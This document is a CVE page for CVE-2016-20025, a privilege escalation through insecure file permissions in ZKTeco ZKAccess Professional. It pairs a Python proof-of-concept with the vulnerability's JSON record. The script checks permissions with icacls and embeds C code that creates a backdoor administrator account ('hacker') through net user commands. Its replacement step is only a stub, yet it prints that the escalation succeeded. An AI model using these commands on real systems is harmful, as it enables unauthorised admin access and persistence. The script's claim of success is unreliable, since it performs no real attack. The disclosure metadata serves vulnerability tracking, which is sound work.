CVE-2016-20025

#!/usr/bin/env python3 """ CVE-2016-20025 PoC - ZKTeco ZKAccess Professional Privilege Escalation This PoC demonstrates the insecure file permissions vulnerability. WARNING: For authorized security testing only. """ import os import sys import ctypes import subprocess def check_file_permissions(file_path): """ Check if the target file has insecure permissions """ try: # Use icacls to check current permissions result = subprocess.run( ['icacls', file_path], capture_output=True, text=True ) print(f"[*] Current permissions for {file_path}:") print(result.stdout) # Check if Authenticated Users has Modify/Write permission if 'Authenticated Users:(I)(M)' in result.stdout or 'Authenticated Users:(I)(W)' in result.stdout: print("[!] VULNERABLE: Authenticated Users has Modify/Write permission") return True return False except Exception as e: print(f"[-] Error checking permissions: {e}") return False def create_malicious_executable(output_path): """ Generate a malicious executable that creates an admin user This creates a simple Windows executable that adds a new admin """ # This would be compiled C code or use msfvenom in real scenario # For demonstration, showing the concept malicious_code = ''' #include <windows.h> #include <stdio.h> int main() { // Create new admin user for privilege escalation system("net user hacker P@ssw0rd123 /add"); system("net localgroup Administrators hacker /add"); // Spawn elevated shell system("cmd.exe /c whoami > C:\\\\temp\\\\pwned.txt"); return 0; } ''' print(f"[*] Malicious executable would be saved to: {output_path}") return True def exploit_vulnerability(target_exe, backup_exe): """ Execute the privilege escalation exploit """ print(f"[*] Starting privilege escalation attack...") # Step 1: Check current permissions if not check_file_permissions(target_exe): print("[-] Target is not vulnerable") return False # Step 2: Backup original executable print(f"[*] Backing up {target_exe}") try: # In real attack: copy target_exe backup_exe pass except: pass # Step 3: Create and deploy malicious executable print("[*] Deploying malicious executable...") create_malicious_executable(target_exe) # Step 4: Wait for privilege escalation trigger print("[*] Malicious file deployed. Waiting for system restart or admin execution...") print("[+] Privilege escalation successful - check for new admin user") return True if __name__ == "__main__": target = r"C:\Program Files\ZKTeco\ZKAccess\ZKAccess.exe" backup = r"C:\Temp\ZKAccess_backup.exe" print("CVE-2016-20025 PoC - ZKTeco ZKAccess Privilege Escalation") print("=" * 60) # Check if running with appropriate privileges if ctypes.windll.shell32.IsUserAnAdmin(): print("[*] Running as Administrator - can verify vulnerability") else: print("[*] Running as limited user - simulating attack scenario") exploit_vulnerability(target, backup)

{"cve": {"id": "CVE-2016-20025", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:48.573", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKAccess Professional 3.5.3 contains an insecure file permissions vulnerability that allows authenticated users to escalate privileges by modifying executable files. Attackers can leverage the Modify permission granted to the Authenticated Users group to replace executable binaries with malicious code for privilege escalation."}, {"lang": "es", "value": "ZKTeco ZKAccess Professional 3.5.3 contiene una vulnerabilidad de permisos de archivo inseguros que permite a los usuarios autenticados escalar privilegios modificando archivos ejecutables. Los atacantes pueden aprovechar el permiso de Modificar otorgado al grupo de Usuarios Autenticados para reemplazar binarios ejecutables con código malicioso para la escalada de privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2016080265", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116486", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138566", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40323/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkaccess-professional-privilege-escalation-via-insecure-permissions", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php", "source": "[email protected]"}]}}